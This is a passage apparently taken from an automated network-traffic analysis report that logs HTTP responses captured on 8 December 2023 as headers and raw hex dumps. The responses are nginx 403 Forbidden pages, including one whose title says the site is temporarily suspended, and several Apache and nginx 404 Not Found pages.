32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 08 Dec 2023 13:51:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"64f9f107-377d8"Content-Encoding: gzipData Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 08 Dec 2023 13:51:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"64f9f107-377d8"Content-Encoding: gzipData Raw: 36 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd ef 8e db 48 b2 2f f8 7d 9e 42 a5 83 b6 a5 31 a5 e2 7f 52 92 e9 9a 9e 1e f7 99 c6 99 9e 6e 8c fb f4 60 51 63 08 2c 89 2a b1 4d 89 ba 24 55 e5 72 b9 0e ee dd 27 d9 af fb ed ec 05 16 d8 c5 ee de 05 f6 09 e6 bc d1 46 44 92 14 ff 4a 49 51 e5 6a fb 4c 75 5b a2 c8 cc 88 cc c8 c8 c8 5f 44 06 c9 97 67 73 7f 16 dd 6d 9c ce 32 5a 79 af 5e e2 67 c7 b3 d7 d7 56 d7 59 77 e1 b7 63 cf 5f bd 5c 39 91 dd 99 2d ed 20 74 22 ab fb af 3f 7d 3b 30 e1 5a e4 46 9e f3 ea ef ff cb df ff fd ef ff db df ff c7 7f fc cf 7f ff f7 ce 7f fc 37 f8 f1 7f d2 e1 df ff fb 7f fc d7 bf ff ef 7f ff bf e1 df ff 03 ff fd 8f ce df ff 5f 38 f1 7f 40 c1 ff 86 d7 f1 d4 df ff fb df ff 2f ba fc ef 2f cf 19 b1 97 61 74 e7 39 9d 95 33 77 6d ab 6b 7b 5e f7 d5 f9 6f cf 7e fb b9 ff 9d fd f6 6f bf e9 74 b0 1f 9d 59 18 76 86 e7 6b 7f ee 4c 57 fe 7c eb 39 e1 39 9c 1a 78 be 3d 77 82 73 77 3d 77 de 0f 7f 09 2f 2e 66 9e bf 76 e6 7f 81 02 6f 9c 68 a0 0f b7 a1 73 29 bd 3d 2b 54 dd f8 61 94 a9 1e 06 b3 94 44 b1 28 fc 4b cb cd dd 30 3a 9f fd 12 b2 62 57 ce ea fc ca f3 67 ef c2 a1 3d b7 37 91 7b e3 9c 5f 0d 36 f6 75 f2 35 c4 ba 1d ec 07 f4 e2 6f 4f 2d cc d6 7f e7 bf 19 b2 7e dd 83 1c 36 9e 7d 37 5e 78 ce fb 09 7e 0c e6 6e e0 cc 22 d7 5f 8f 67 be b7 5d ad 27 b7 ee 3c 5a 8e 25 51 fc 6a b2 72 d7 03 f6 53 91 c5 cd fb c9 d2 71 af 97 11 bb b6 b1 e7 73 77 7d 3d d6 8c cd fb 8e d8 11 27 2b 3b b8 76 d7 63 71 02 74 fc 60 fc 4f 8a ae c2 ff 93 85 bf 86 1a 32 14 fa 6e 1d 39 81 f0 75 e0 da 9e f0 47 c7 bb 71 22 77 66 77 fe ec 6c 9d dd 4f e1 db c0 71 de d8 eb 50 08 e1 63 10 3a 81 bb 98 5c d9 b3 77 d7 81 bf 5d cf c7 ff b4 58 2c 26 83 5b e7 ea 9d 1b 0d 22 7b 33 58 42 8b 3c 6c d5 80 b1 8d 02 a8 b7 b1 03 67 1d 3d e0 d4 1e af fd a8 37 74 c3 69 32 d0 fd 4e 22 0b ff c6 09 16 9e 7f 3b 78 3f 5e ba f3 b9 b3 7e f8 1d 4d c3 4e 6f d7 6f 49 94 d5 cd fb fe 7d 96 c2 1e 02 0f f1 a5 29 1a 98 29 34 e3 1d 88 e8 1e c9 ed 44 77 b3 cc 97 72 82 c0 0f 18 c1 44 a6 e2 81 a6 4f 57 ce 7a 3b c0 c2 38 70 70 7d ee cc 85 e6 55 06 f6 0c cb 24 6c 07 91 bf 01 d6 cd 84 50 45 b7 40 f0 a1 61 13 24 d4 b5 13 34 a3 ba 7b 87 b4 22 57 3a 33 03 46 23 1d 5a 75 40 c8 70 c5 5d dc 0d ae 02 ff 16 54 77 7a e3 86 ee 95 97 a7 a9 a9 8d 3b 77 a0 4d 95 f2 e0 6d c9 6e 70 fc 2b d7 73 06 89 4e 4f 99 46 0b c9 e5 70 7b 85 22 9e fa 1b 07 ac 74 aa fa 89 e2 1f 90 cb 74 e1 fb 30 f9 07 73 ff 76 7d 50 51 ab 1b 72 a0 56 5d fb e2 8e 37 55 a7 43 e4 1a ab 67 65 a7 2a e8 0e dd dd b0 27 c6 9a 96 aa 87 2a 59 de a3 09 1f 4b 60 7f ed 6d e4 4f 8a a3 92 21 96 af 96 b7 48 5f 35 ed 4d 8e 56 45 1f 2a 8a 4d d3 ae 27 aa 58 aa 57 ac 06 9d a8 66 09 a6 1e 96 92 75 94 6a f3 95 1f 45 fe 0a 26 77 1d 09 f6 33 15 e8 1a 90 c6 ae 6c 4c 6d 70 1b d8 9b 0d 94 4a 16 32 92 69 6d b1 29 01 b7 29 82 8f 4c 4b 02 92 29 8a 2e 59 20 07 9e b3 60 67 f8
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 08 Dec 2023 13:51:11 GMTContent-Type: text/htmlContent-Length: 227288Connection: closeVary: Accept-EncodingETag: "64f9f107-377d8"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e d0 a0 d0 b0 d0 b1 d0 be d1 82 d0 b0 20 d1 81 d0 b0 d0 b9 d1 82 d0 b0 20 d0 b2 d1 80 d0 b5 d0 bc d0 b5 d0 bd d0 bd d0 be 20 d0 bf d1 80 d0 b8 d0 be d1 81 d1 82 d0 b0 d0 bd d0 be d0 b2 d0 bb d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 61 64 61 70 74 69 76 65 2f 62 2d 70 61 67 65 2f 62 2d 70 61 67 65 2e 6c 65 73 73 20 2a 2a 2a 21 0a 20 20 5c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 35 37 70 78 20 30 20 30 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 33 36 34 33 36 34 3b 66 6f 6e 74 3a 31 32 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:21 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:24 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 08 Dec 2023 13:51:42 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 08 Dec 2023 13:51:48 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 